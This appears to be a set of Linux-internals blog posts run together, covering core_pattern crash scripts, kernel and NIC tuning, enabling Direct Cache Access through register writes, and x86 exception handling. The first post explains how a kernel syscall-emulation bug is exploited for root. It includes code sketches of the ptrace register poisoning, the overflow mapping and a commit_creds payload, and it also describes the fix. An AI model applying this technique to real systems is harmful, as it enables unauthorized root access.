ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

Software interrupt 0x80.

The sysenter family of instructions.

The sysenter family of instructions is a faster syscall interface than the traditional int 0x80 interface, but isn't available on some older 32-bit Intel CPUs.

The Linux kernel has a layer of code that allows syscalls executed via int 0x80 to keep working on newer 64-bit kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass execution off to the desired system call, thus maintaining support for this older system call interface.
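To make the old interface concrete, here is a minimal sketch (my example, not code from this post) of invoking getpid through int 0x80; the syscall number goes in eax and the return value comes back in eax. Built as a 32-bit binary this hits the 32-bit syscall table directly; run on a 64-bit kernel, the same instruction lands in the ia32 emulation layer described below.

#include <stdio.h>

int main(void)
{
        long ret;

        /* 20 is __NR_getpid in the 32-bit syscall table */
        asm volatile("int $0x80" : "=a"(ret) : "a"(20L));
        printf("pid: %ld\n", ret);
        return 0;
}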

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the ia32 syscall emulation code, we see some code in place to support ptrace [1]:

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Notice the LOAD_ARGS32 macro and the comment above it. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke the desired system call. Reloading these register values is crucial to ensure that the system call is invoked correctly.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

The parent calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow, as we'll see shortly. ptrace is then invoked to resume execution in the child.
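A minimal sketch of that parent loop (my reconstruction, not the exploit's exact code; at syscall entry the syscall number shows up in orig_rax):

#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>

/* sketch: assumes the child already called PTRACE_TRACEME; no error handling */
static void trace_child(pid_t pid)
{
        struct user_regs_struct regs;
        int status;

        for (;;) {
                ptrace(PTRACE_SYSCALL, pid, 0, 0);   /* run to next syscall entry/exit */
                waitpid(pid, &status, 0);
                if (WIFEXITED(status))
                        break;
                ptrace(PTRACE_GETREGS, pid, 0, &regs);
                if (regs.orig_rax == 0x101) {
                        regs.orig_rax = 0x800000101ULL;  /* poison the syscall number */
                        ptrace(PTRACE_SETREGS, pid, 0, &regs);
                }
        }
}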

While this is happening, the child process is executing. It begins by looking up the addresses of two symbols in the kernel:

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).
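You can check the wraparound arithmetic yourself:

unsigned long tmp = 0xffffffff80000000UL + (0x0000000800000101UL * 8);
/* 0x800000101 * 8 == 0x4000000808; the sum overflows 64 bits,
 * leaving tmp == 0x0000003f80000808, which rounds down to the
 * page boundary 0x3f80000000 */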

Next, the child process writes the address of a function called kernelmodecode, which makes use of the commit_creds and prepare_kernel_cred symbols that were looked up earlier:
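A rough sketch of what such a payload looks like (the function-pointer plumbing here is my simplification; the real exploit resolves the two symbol addresses at runtime and uses the kernel's actual signatures):

/* pointers filled in with the addresses looked up earlier */
static int   (*commit_creds)(void *new);
static void *(*prepare_kernel_cred)(void *daemon);

/* runs in kernel mode: swaps our credentials for fresh root credentials */
static int kernelmodecode(void *file, void *vma)
{
        commit_creds(prepare_kernel_cred(0));
        return -1;
}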

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow (0x800000101) and resumes execution in the child.

The check succeeds, because cmpl compares only the lower 32 bits of rax (0x101) against IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which indexes far past the end of the syscall table, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode, setting the privileges of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper 32 bits of rax and change the comparison to examine the entire 64-bit register. You can see the diffs of the fix here and here.
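Paraphrasing the patched entry path, the idea is along these lines:

movl %eax,%eax                    /* zero-extend: clears the upper 32 bits of rax */
cmpq $(IA32_NR_syscalls-1),%rax   /* compare the full 64-bit register */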

tl;dr

This post will describe how I stumbled upon a code path in the Linux kernel which allows external programs to be launched when a core dump is about to happen. I provide a link to a short and ugly Ruby script which captures a faulting process, runs gdb to get a backtrace (and other information), captures the core dump, and then generates a notification email.

Your processes may get automatically restarted when a fault occurs and you may even get an email letting you know your process died. Both of those things are useful, but it turns out that with just a tiny bit of extra work you can actually get very detailed emails showing a stack trace, register information, and a snapshot of the process’ files in /proc.

random walking the linux kernel

One day I was sitting around wondering how exactly the coredump code paths are wired. I cracked open the kernel source and started reading.

In the above code, core_pattern (which can be set with a sysctl or via /proc/sys/kernel/core_pattern) is examined to determine if the first character is a |. If so, format_corename returns 1. So | seems relatively important, but at this point I’m still unclear on what it actually means.

Scanning the rest of the code for do_coredump reveals something very interesting [3] (this is more code from the function in the first code snippet above):

WTF? call_usermodehelper_fns? umh_pipe_setup? This is looking pretty interesting. If you follow the code down a few layers, you end up at call_usermodehelper_exec, which has the following very enlightening comment:

/**
* call_usermodehelper_exec - start a usermode application
*
* . . .
*
* Runs a user-space application. The application is started
* asynchronously if wait is not set, and runs as a child of keventd.
* (ie. it runs with full root capabilities).
*/

what it all means

Altogether, this is actually pretty fucking sick:

You can set /proc/sys/kernel/core_pattern to run a script when a process is going to dump core.

Your script is run before the process is killed.

A pipe is opened and attached to your script. The kernel writes the coredump to the pipe. Your script can read it and write it to storage.

Your script can attach GDB, get a backtrace, and gather other information to send a detailed email.

But the coolest part of all:

All of the files in /proc/[pid] for that process remain intact and can be inspected. You can check the open file descriptors, the process’s memory map, and much much more.

ruby codez to harness this amazing code path

I whipped up a pretty simple, ugly Ruby script. You can get it here. I set up my system to use it by:
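Something like the following (the script path is just an example; %p, %s, %u, and %g are core_pattern specifiers for the PID, signal number, UID, and GID):

echo "|/usr/local/bin/core_helper.rb %p %s %u %g" > /proc/sys/kernel/core_pattern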

Why didn’t you read the documentation instead?

This (as far as I can tell) little-known feature is documented at linux-kernel-source/Documentation/sysctl/kernel.txt under the “core_pattern” section. I didn’t read the documentation because (little known fact) I actually don’t know how to read. I found the code path randomly and it was much more fun and interesting to discover this little feature by diving into the code.

Conclusion

This could/should probably be a feature/plugin/whatever for god/monit/etc instead of a stand-alone script.

Reading code to discover features doesn’t scale very well, but it is a lot more fun than reading documentation all the time. Also, you learn stuff and reading code makes you a better programmer.

This article is going to address some kernel and driver tweaks that are interesting and useful. We use several of these in production with excellent performance, but you should proceed with caution and do research prior to trying anything listed below.

Tickless System

The tickless kernel feature allows for on-demand timer interrupts. This means that during idle periods, fewer timer interrupts will fire, which should lead to power savings, cooler running systems, and fewer useless context switches.

Kernel option: CONFIG_NO_HZ=y

Timer Frequency

You can select the rate at which timer interrupts in the kernel will fire. When a timer interrupt fires on a CPU, the process running on that CPU is interrupted while the timer interrupt is handled. Reducing the rate at which the timer fires allows for fewer interruptions of your running processes. This option is particularly useful for servers with multiple CPUs where processes are not running interactively.

Kernel options: CONFIG_HZ_100=y and CONFIG_HZ=100

Connector

The connector module is a kernel module which reports process events such as fork, exec, and exit to userland. This is extremely useful for process monitoring. You can build a simple system (or use an existing one like god) to watch mission-critical processes. If the processes die due to a signal (like SIGSEGV or SIGBUS) or exit unexpectedly, you’ll get an asynchronous notification from the kernel. The processes can then be restarted by your monitor, keeping downtime to a minimum when unexpected events occur.

Kernel options: CONFIG_CONNECTOR=y and CONFIG_PROC_EVENTS=y

TCP segmentation offload (TSO)

A popular feature among newer NICs is TCP segmentation offload (TSO). This feature allows the kernel to offload the work of dividing large packets into smaller packets to the NIC. This frees the CPU up to do more useful work and reduces the amount of overhead the CPU pushes across the bus. If your NIC supports this feature, you can enable it with ethtool:
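For example, assuming your interface is eth0:

ethtool -K eth0 tso on

You can verify the setting afterward with ethtool -k eth0, which prints the offload settings.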

Intel I/OAT DMA Engine

This kernel option enables the Intel I/OAT DMA engine that is present in recent Xeon CPUs. This option increases network throughput as the DMA engine allows the kernel to offload network data copying from the CPU to the DMA engine. This frees up the CPU to do more useful work.

There’s also a sysfs interface where you can get some statistics about the DMA engine. Check the directories under /sys/class/dma/.
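For example (channel names vary per machine, and these attribute names are the dmaengine sysfs attributes as I remember them — verify against your kernel):

[joe@timetobleed]% ls /sys/class/dma/dma0chan0/
bytes_transferred  in_use  memcpy_count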

Kernel options: CONFIG_DMADEVICES=y and CONFIG_INTEL_IOATDMA=y and CONFIG_DMA_ENGINE=y and CONFIG_NET_DMA=y and CONFIG_ASYNC_TX_DMA=y

Direct Cache Access (DCA)

Intel’s I/OAT also includes a feature called Direct Cache Access (DCA). DCA allows a driver to warm a CPU cache. A few NICs support DCA; the most popular (to my knowledge) is the Intel 10GbE driver (ixgbe). Refer to your NIC driver documentation to see if your NIC supports DCA. To enable DCA, a switch in the BIOS must be flipped. Some vendors supply machines that support DCA but don’t expose a switch for it. If that is the case, see my last blog post for how to enable DCA manually.

You can check if DCA is enabled:

[joe@timetobleed]% dmesg | grep dca
dca service started, version 1.8

If DCA is possible on your system but disabled you’ll see:

ioatdma 0000:00:08.0: DCA is disabled in BIOS

Which means you’ll need to enable it in the BIOS or manually.

Kernel option: CONFIG_DCA=y

NAPI

The “New API” (NAPI) is a rework of the packet processing code in the kernel to improve performance for high speed networking. NAPI provides two major features [1]:

Interrupt mitigation: High-speed networking can create thousands of interrupts per second, all of which tell the system something it already knew: it has lots of packets to process. NAPI allows drivers to run with (some) interrupts disabled during times of high traffic, with a corresponding decrease in system load.

Packet throttling: When the system is overwhelmed and must drop packets, it’s better if those packets are disposed of before much effort goes into processing them. NAPI-compliant drivers can often cause packets to be dropped in the network adaptor itself, before the kernel sees them at all.

Many recent NIC drivers automatically support NAPI, so you don’t need to do anything. Some drivers need you to explicitly specify NAPI in the kernel config or on the command line when compiling the driver. If you are unsure, check your driver documentation. A good place to look for docs is in your kernel source under Documentation, available on the web here: http://lxr.linux.no/linux+v2.6.30/Documentation/networking/ — but be sure to select the correct kernel version first!

Throttle NIC Interrupts

Some drivers allow the user to specify the rate at which the NIC will generate interrupts. The e1000e driver allows you to pass a command line option, InterruptThrottleRate, when loading the module with insmod. For the e1000e there are two dynamic interrupt throttle mechanisms, specified on the command line as 1 (dynamic) and 3 (dynamic conservative). The adaptive algorithm sorts traffic into different classes and adjusts the interrupt rate appropriately. The difference between dynamic and dynamic conservative is the rate for the “Lowest Latency” traffic class: dynamic (1) has a much more aggressive interrupt rate for this traffic class.

As always, check your driver documentation for more information.

With insmod: insmod e1000e.o InterruptThrottleRate=1

Process and IRQ affinity

Linux allows the user to specify which CPUs processes and interrupt handlers are bound to.

Processes: You can use taskset to specify which CPUs a process can run on.

Interrupt Handlers: The interrupt map can be found in /proc/interrupts, and the affinity for each interrupt can be set in the file smp_affinity in the directory for each interrupt under /proc/irq/ (see the example below).
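For example (PID 1234 and IRQ 63 are made up; smp_affinity takes a hexadecimal CPU bitmask):

taskset -cp 0 1234                    # let PID 1234 run only on CPU 0
echo 1 > /proc/irq/63/smp_affinity    # steer IRQ 63 to CPU 0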

This is useful because you can pin the interrupt handlers for your NICs to specific CPUs. When a shared resource (say, a lock in the network stack) is touched and loaded into a CPU cache, the next time the handler runs it will be put on the same CPU, avoiding the costly cache invalidations that can occur if the handler lands on a different CPU.

Better still, reports [2] indicate that improvements of up to 24% can be had if processes and the IRQs for the NICs those processes get data from are pinned to the same CPUs. Doing this ensures that the data loaded into the CPU cache by the interrupt handler can be used (without invalidation) by the process; extremely high cache locality is achieved.

oprofile

oprofile is a system-wide profiler that can profile both kernel and application level code. There is a kernel driver for oprofile which collects data from the x86’s Model Specific Registers (MSRs) to give very detailed information about the performance of running code. oprofile can also annotate source code with performance information to make fixing bottlenecks easy. See oprofile’s homepage for more information.

Kernel options: CONFIG_OPROFILE=y and CONFIG_HAVE_OPROFILE=y

epoll

epoll(7) is useful for applications which must watch for events on large numbers of file descriptors. The epoll interface is designed to easily scale to large numbers of file descriptors. epoll is already enabled in most recent kernels, but some strange distributions (which will remain nameless) have this feature disabled.
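The interface itself is tiny; a minimal sketch of the create/register/wait cycle (watching stdin, my example) looks like this:

#include <stdio.h>
#include <sys/epoll.h>
#include <unistd.h>

int main(void)
{
        struct epoll_event ev = { .events = EPOLLIN, .data.fd = STDIN_FILENO };
        struct epoll_event ready[16];
        int n, epfd = epoll_create(16);  /* size is only a hint on modern kernels */

        epoll_ctl(epfd, EPOLL_CTL_ADD, STDIN_FILENO, &ev);
        n = epoll_wait(epfd, ready, 16, -1);  /* block until something is readable */
        printf("%d fd(s) ready\n", n);
        close(epfd);
        return 0;
}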

Kernel option: CONFIG_EPOLL=y

Conclusion

There are a lot of useful levers that can be pulled when trying to squeeze every last bit of performance out of your system.

It is extremely important to read and understand your hardware documentation if you hope to reach the maximum throughput your system can achieve.

You can find documentation for your kernel online at the Linux LXR. Make sure to select the correct kernel version because docs change as the source changes!

This blog post is going to describe a C program that toggles some CPU and chipset registers directly to enable Direct Cache Access without needing a reboot or a switch in the BIOS. A very fun hack to write and investigate.

Special thanks…

Special thanks going out to Roman Nurik for helping me make the code CSS much, much prettier and easier to read.

Special thanks going out to Jake Douglas for convincing me that I shouldn’t use a stupid sensationalist title for this blog article :)

Intel I/OAT and Direct Cache Access (DCA)

I/OAT (I/O Acceleration Technology) is the name for a collection of techniques by Intel to improve network throughput. The most significant of these is the DMA engine, which is meant to take the work of copying [socket buffer] data to the user buffer off of the CPU. This is not a zero-copy receive, but it does allow the CPU to do other work while the copy operations are performed by the DMA engine.

Cool! So by using I/OAT the network stack in the Linux kernel can offload copy operations to increase throughput. I/OAT also includes a feature called Direct Cache Access (DCA) which can deliver data directly into processor caches. This is particularly cool because when a network interrupt arrives and data is copied to system memory, the CPU that will access this data won’t take a cache miss; DCA has already put the data it needs in the cache. Sick.

Measurements from the Linux Foundation project [2] indicate a 10% reduction in CPU usage, while the Myri-10G NIC website claims they’ve measured a 40% reduction in CPU usage [3]. For more information describing the performance benefits of DCA see this incredibly detailed paper: Direct Cache Access for High Bandwidth Network I/O.

How to get I/OAT and DCA

To get I/OAT and DCA you need a few things:

Intel Xeon CPU(s)

A NIC (or NICs) with DCA support

A chipset which supports DCA

The ioatdma and dca Linux kernel modules

And last but not least, a switch in your BIOS to turn DCA on

That last item can actually be a bit more tricky than it sounds for several reasons:

Some BIOSes don’t expose a way to turn DCA on even though it is supported by the CPU, chipset, and NIC!

Your hosting provider may not allow BIOS access

Your system might be up and running and you don’t want to reboot to enter the BIOS to enable DCA

Let’s see what you can do to coerce DCA into working on your system if one of the above applies to you.

Build ioatdma kernel module

This is pretty easy: just run make menuconfig and toggle I/OAT as a module. You must build it as a module if you cannot or do not want to enable DCA in your BIOS.

The option can be found in Device Drivers -> DMA Engine Support -> Intel I/OAT DMA Support.

Toggling that option will build the ioatdma and dca modules. Build and install the new module.

Enabling DCA without a reboot or BIOS access: Hack overview

In order to enable DCA, a few special registers need to be touched:

The DCA capability bit in the PCI Express Control Register 4 in the configuration space for the PCI bridge your NIC(s) are attached to.

The DCA Model Specific Register on your CPU(s)

Let’s take a closer look at each stage of the hack.

Enable DCA in PCI Configuration Space

PCI configuration space is a memory region where control registers for PCI devices live. By changing register values, you can enable/disable specific features of that PCI device. The configuration space is addressable if you know the PCI bus, device, and function numbers for a specific PCI device, plus the register offset for the feature you care about.

To find the DCA register for the Intel 5000, 5100, and 7300 chipsets, we need to consult the documentation [4]:

Cool, so the register we need lives at offset 0x64. To enable DCA, bit 6 needs to be set to 1.

Toggling these registers can be a bit cumbersome, but luckily there is libpci, which provides some simple APIs for scanning PCI devices and accessing configuration space registers.
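A sketch of that using libpci (the matching logic for finding the right bridge is elided; blindly setting the bit on every device, as below, is for illustration only — compile with -lpci):

#include <pci/pci.h>

int main(void)
{
        struct pci_access *pacc = pci_alloc();
        struct pci_dev *dev;
        u8 val;

        pci_init(pacc);
        pci_scan_bus(pacc);
        for (dev = pacc->devices; dev; dev = dev->next) {
                /* offset 0x64, bit 6: the DCA enable bit from the chipset docs */
                val = pci_read_byte(dev, 0x64);
                pci_write_byte(dev, 0x64, val | (1 << 6));
        }
        pci_cleanup(pacc);
        return 0;
}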

Enable DCA in the CPU MSR

A model specific register (MSR) is a control register provided by a CPU to enable a feature that exists on a specific CPU. In this case, we care about the DCA MSR. In order to find its address, let’s consult the Intel Developer’s Manual 3B [5].

This register lives at offset 0x1f8. We just need to set it to 1 and we should be good to go.
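With the msr kernel module loaded, MSRs can be written from userland through /dev/cpu/N/msr, where the file offset selects the MSR address. A sketch for CPU 0 (repeat for each CPU):

#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>

int main(void)
{
        uint64_t val = 1;
        int fd = open("/dev/cpu/0/msr", O_WRONLY);

        pwrite(fd, &val, sizeof(val), 0x1f8);  /* 0x1f8: the DCA MSR from the manual */
        close(fd);
        return 0;
}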

Another post about signal handling?

There are probably lots of people who have blogged about signal handling in Linux, but this series is going to be different. In this blog post, I’m going to unravel the signal handling code paths in the Linux kernel starting at the hardware level, working through the kernel, and ending in the userland signal handler. I’ve tried to use footnotes for code samples which have links to the code in the Linux lxr. Many of the code examples have been snipped for brevity.

As always, this post is specific to the x86_64 CPU architecture and Linux kernel 2.6.29.

Hardware or software generated

Signals are not generated directly by hardware, but certain hardware states can cause the Linux kernel to generate signals. As such we can imagine two ways to generate signals:

Hardware – the CPU does something bad (divides by 0, touches a bad address, etc) which causes the kernel to create and deliver (unless the signal is SIGKILL or SIGSTOP, of course) a signal (SIGFPE, SIGSEGV, etc) to the running process.

Software – an application executes a kill() system call and sends a signal to a specific process.

Both types of signals share a common code path, but hardware generated signals have a very interesting birth. Let’s start there and as we work our way up to userland we’ll stumble into the software signal code path along the way.

Exceptions on the x86

Let’s start by first understanding what an x86 exception is. For that, we’ll turn to the documentation [1]:

[...] exceptions are events that indicate that a condition exists somewhere in the system, the processor, or within the currently executing program or task that requires the attention of a processor. They typically result in a forced transfer of execution from the currently running program or task to a special software routine [...] or an exception handler.

At a high level this is pretty simple to understand; the system gets in a weird state and the CPU immediately begins executing a predefined handler function to try to fix things (if it can) or die gracefully.

Let’s take a look at how the kernel creates and installs handler functions that the CPU executes when an exception occurs.

Low-level exception handlers

Low level exception handlers are specified in the Interrupt Descriptor Table (IDT). The IDT can hold up to 256 entries and it can live anywhere in memory. Each entry in the IDT is mapped to a different exception. For example, #DE Divide Error is the first entry in the IDT, IDT[0]; #PF Page Fault’s handler lives at IDT[14]. When a specific exception is encountered, the CPU looks up the handler function in the IDT, puts some data on the stack, and executes the handler.

What does an entry in the IDT look like? Let’s take a look at a picture [2] from Intel:

Take a look at the fields labeled ‘Offset’ – this is the field that contains the address of the function to execute. As you can see, there are three fields labeled ‘Offset.’ Can you guess why?

In order to actually set the address of the function you want to execute, you’ll need to do some bit-shifting. Each ‘Offset’ field indicates which bits of the handler function’s address it holds. You need to be really careful when writing the code that is responsible for creating IDT entries. A bug here could cause your system to do really bizarre things.
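To make the bit-shifting concrete, here is a sketch of a 64-bit IDT entry (the field names are mine, not the kernel's) and how a handler address gets split across the three Offset fields:

#include <stdint.h>

struct idt_entry {
        uint16_t offset_low;     /* handler address, bits 0..15   */
        uint16_t selector;       /* code segment selector          */
        uint16_t flags;          /* IST index, type, DPL, present  */
        uint16_t offset_mid;     /* handler address, bits 16..31  */
        uint32_t offset_high;    /* handler address, bits 32..63  */
        uint32_t reserved;
} __attribute__((packed));

static void set_handler(struct idt_entry *e, uint64_t addr)
{
        e->offset_low  = addr & 0xffff;
        e->offset_mid  = (addr >> 16) & 0xffff;
        e->offset_high = addr >> 32;
}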

We know what an IDT entry looks like, but what about the data that the CPU pushes on the stack before executing a handler? Unfortunately, I couldn’t track down a picture of what the x86_64 puts on the stack and I can’t draw. So, here is a picture of the data the x86 CPU puts on the stack, from Intel [3]:

When an exception occurs, the CPU pushes the stack pointer, the CPU flags register value, the code and stack segment selectors, and the instruction pointer on to the stack before executing the handler.

Nice, but where does the IDT itself live?

The address of the IDT is stored in a CPU register that can be accessed with the instructions lidt and sidt to load and store (respectively) the address of the IDT. Usually, the address of the IDT is set during the initialization of the kernel.
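As an aside, on CPUs of this era sidt isn't a privileged instruction, so even userland can ask where the IDT lives:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
        struct {
                uint16_t limit;
                uint64_t base;
        } __attribute__((packed)) idtr;

        asm volatile("sidt %0" : "=m"(idtr));  /* store the IDT register */
        printf("IDT at 0x%llx, limit 0x%x\n",
               (unsigned long long)idtr.base, idtr.limit);
        return 0;
}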

Cool, so Linux creates a bunch of early handlers in case something goes bad during boot. Then, a few function calls later (not shown), Linux calls start_kernel() [5], which calls trap_init() [6] for your architecture, which actually sets the handlers.

This is pretty important, so let's take a look at the code for this. Thankfully, Linux includes some descriptive function names, so we can see which exceptions are being set.

So the macro uses the first argument sym as the name of the function, and the second argument do_sym is a C function that is called from this assembly stub.

We also notice from the stub above a very important (and somewhat subtle) piece of code: movq %rsp,%rdi. This puts the address of the stack pointer in %rdi, and we'll see why shortly. First, let's look at how the macro is used to get a better idea of how it works:

This block of code uses the macro above to create symbols named divide_error, overflow, and more which call out to C functions named do_divide_error, do_overflow, etc. The craziness doesn't end there. These C functions are also generated with macros [9].
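Paraphrased from 2.6-era traps.c (the notifier and interrupt re-enabling details are trimmed), the macro and its uses read roughly like this:

#define DO_ERROR(trapnr, signr, str, name)                            \
dotraplinkage void do_##name(struct pt_regs *regs, long error_code)   \
{                                                                     \
        /* ...notify listeners, conditionally re-enable interrupts... */ \
        do_trap(trapnr, signr, str, regs, error_code, NULL);          \
}

DO_ERROR(4, SIGSEGV, "overflow", overflow)
DO_ERROR(5, SIGSEGV, "bounds", bounds)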

Those last two lines get substituted with the macro above, creating do_overflow, do_bounds, and more. As you might have noticed, the generated functions carry dotraplinkage, which is a macro for the gcc attribute regparm, which tells gcc to pass arguments to the function in registers and not on the stack.

Remember the movq %rsp,%rdi from the common assembly stub? That line of code exists to pass the address of the state the CPU dumped to the do_* functions via the %rdi register.

The do_* functions notify interested parties about the exception, re-enable interrupts/exceptions if they were disabled, and finally tell the upper layer signal handling code of the kernel that a signal should be generated, handing over the associated CPU state at the time the exception was generated.

Conclusion for Part 1

Wow. What a wild ride that was.

There is a lot of trickery and subtle hacks in the Linux kernel. Reading and understanding the code can make you a more clever programmer. Dig in!

It is pretty cool (imho) to understand how you actually converse with the CPU and how the CPU talks to the kernel, and how that data is pushed to the upper layers.

The Intel CPU manuals, the gcc man page, and the Linux lxr are a big time help for deciphering this code, which can be cryptic at times.

Understanding what information you have at your disposal can let you do pretty crazy things in userland, as we'll see in the next piece of this series.

Stay tuned, in the next piece of this series I'll walk through the signal handling code in the kernel and show some crazy non-portable tricks you can do in userland.